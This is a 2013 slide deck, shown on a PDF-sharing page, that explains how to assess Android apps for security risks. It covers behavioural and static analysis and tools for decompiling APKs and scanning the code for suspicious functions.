Android Application Assessment

Author: Coleen Cameron

1 downloads 0 Views 695KB Size

Report

Download PDF

Recommend Documents

*droid: Assessment and Evaluation of Android Application Analysis Tools

The QuickieComposer Android Application

Introduction to Android and Android Application Development

5. Android Anwendungshinweis. Android Application Note

Android Application Guide

Mobile Application Development Android

MIRACLE ANDROID APPLICATION

Android Tab View Application

Android Application for College Website

Android Application Development & Its Security

Instructions for Application for Android

Voice Application Development for Android

OnviGuard Secure Messaging Android Application

Security Attacks on Android Application

Documentation Gereedschapbeheer Android application. GB Inspect. Manual Gereedschapbeheer Android application GB Inspect - 1

Blue VNA Android Application User s Manual

AN EDUCATIONAL BLUETOOTH QUIZZING APPLICATION IN ANDROID

Agriculture Supply Chain Management Based Android Application

An Inimitable application for Blind using Android

SMART PHONE USER ASSISTANCE APPLICATION FOR ANDROID

Remote Mobile Tracking Application Using Android Spy

Tenant Assessment Application Form

Cloud Application Assessment Toolkit

A Assessment: Informix Application Developer-Assessment

Android Application Assessment Inspecting Android Applications for Known Issues

Android Application Assessment- © 2013 Christopher 1

Assessing Mobile Apps (1) • Risk from mobile applications – –

–

Low – app poses little or no threat to device and data on device Moderate – app poses some threat to device protective measures and data stored on device High – app is likely to circumvent device protective measures and/or exfiltrate private data ● ●

All address book data to a server Intent with poor filtering

Android Application Assessment - © 2013 Christopher2

Assessing Mobile Apps (2) • Checklist of actions to perform for mobile app assessment • Checklists are effective in this context • Helps to build in house knowledge for ongoing assessment, once the org starts to assess apps, you are responsible to do so for evermore… Android Application Assessment - © 2013 Christopher3

Threats • Primary threat to Android devices is mobile malware – –

SMS premium rate messages cost people money Private Data Theft

• Pen test objective is to model the threats associated with running the apps • Non-malware threats use the same methods as malware Android Application Assessment - © 2013 Christopher

4

Two Types of Assessments • Behavioral – –

– –

Use a sandbox environment Watch file access, network traffic, SMS messages, Calls Easier when dealing with obfuscated code App may not misbehave while you’re watching

• Static Code Analysis More challenging – More thorough (if done properly) – Can detect latent behaviors, long running timers and triggered events Android Application Assessment - © 2013 Christopher5 –

Checklist • Checklists are lame • But checklists have proven to be extremely effective at preventing mistakes in routine (and important) tasks – –

Pre-flight checklist Medical Checklist

Android Application Assessment - © 2013 Christopher6

Android Static Analysis - 1 • Android Static Analysis –

– –

Applications for Android come in the form of Android Packages (APK) APKs contain a Dalvik Executable (DEX), a Manifest, and other files DEX is bit code compiled Java code ●

We can use two different approaches to extract Java code from DEX files

Android Application Assessment - © 2013 Christopher7

Android Static Analysis - 2 • Android Static Analysis – – –

This is a challenging thing to do! There are some tools that are available to help with automation Look at a few of these, then dig into a manual method

Android Application Assessment - © 2013 Christopher8

Automated Analysis - 1 • Stowaway –

–

Online assessment, requires upload of the apk file to the server at http://www.android-permissions.org/ Gives a listing of the permissions requested, and if the permissions are actually used

Android Application Assessment - © 2013 Christopher9

Automated Analysis - 2 • Androwarn – –

–

Static assessment Produces HTML report of potentially sensitive actions based on the function calls present in the code Available from: https:// github.com/maaaaz/androwarn

Android Application Assessment - © 2013 Christopher10

Manual Analysis • Back to manual – – –

–

Manual code inspection provides the most thorough assessment Requires the most skill Objective is to help you develop a methodology for quickly scouring code for known suspicious functions We’ll use Eclipse and FindBugs™ to accomplish this

Android Application Assessment - © 2013 Christopher11

Eclipse • Eclipse is a development environment • Provides opportunity for code review But this is manual – Need to know java fairly well to know what to look for – We can help resolve this with FindBugs™ Android Application Assessment - © 2013 Christopher –

12

FindBugs™ • FindBugs™ is a suite of checks for known programming flaws • It is intended to help programmers to avoid known, common errors • We are going to adapt it to our purpose of looking for code that is suspicious and warrants review Android Application Assessment - © 2013 Christopher13

Install Eclipse • http://www.eclipse.org/downloads • Download eclipse classic • Install default ●

Next, next, finish ;-)

Android Application Assessment - © 2013 Christopher14

Install FindBugs™ - 1 • Eclipse: Help->“Install New Software…”

Android Application Assessment - © 2013 Christopher15

Install FindBugs™ - 2 • Click Add… • Enter “FindBugs update site” (no quotes) for the name • Enter “http://findbugs.c s.umd.edu/eclipse ” (no quotes) as the Location • Click “OK” Android Application Assessment - © 2013 Christopher16

Install FindBugs™ - 3 • Click “Select All” • Click “Next”

Android Application Assessment - © 2013 Christopher17

Install FindBugs™ - 4 • Accept the warning

Android Application Assessment - © 2013 Christopher18

Dalvik to Java - 1 • Now we need to have java code to import into eclipse • We will use the APK files to inspect the code. • There are two main ways to do this – –

Dex2jar Smali / apktool

Android Application Assessment - © 2013 Christopher19

Dalvik to Java - 2 • Use dex2jar.bat to get readable, but non-executable java code • Use smali and apktool to get executable, but difficult to read java code • You will probably end up doing both, as each is useful in its own way Android Application Assessment - © 2013 Christopher20

APK disassembly – smali • Smali and apktool method • Results in code that can be modified and recompiled

Android Application Assessment - © 2013 Christopher21

APK disassembly – Dex2jar • Dex2jar method

Android Application Assessment - © 2013 Christopher22

Sidebar – Android Package downloads • Where can you get the code to assess? – – –

Download .apk file from internet Move application to removable sdcard, then remove sdcard and copy Copy .apk file from rooted android device

• Malware –

http://contagiominidump.blogspot.com is a repository of known android malware

Good material to practice with, but be careful with Androidmalware! Application Assessment - © 2013 Christopher23 ●

Import code to Eclipse • 1) Create new project

Android Application Assessment - © 2013 Christopher24

Import code to Eclipse • 1) Import external archive

Android Application Assessment - © 2013 Christopher25

Conclusion • App Assessment is a valuable task to protect individuals and organizations – – –

Behavioral Automated code analysis Static code analysis

• Android has substantial threats from malware Android Application Assessment - © 2013 Christopher26

Contact Info • [email protected] –

LinkedIn e-mail

• +ChrisCrowley –

G+

• @CCrowMontance –

#Twitter

Android Application Assessment - © 2013 Christopher27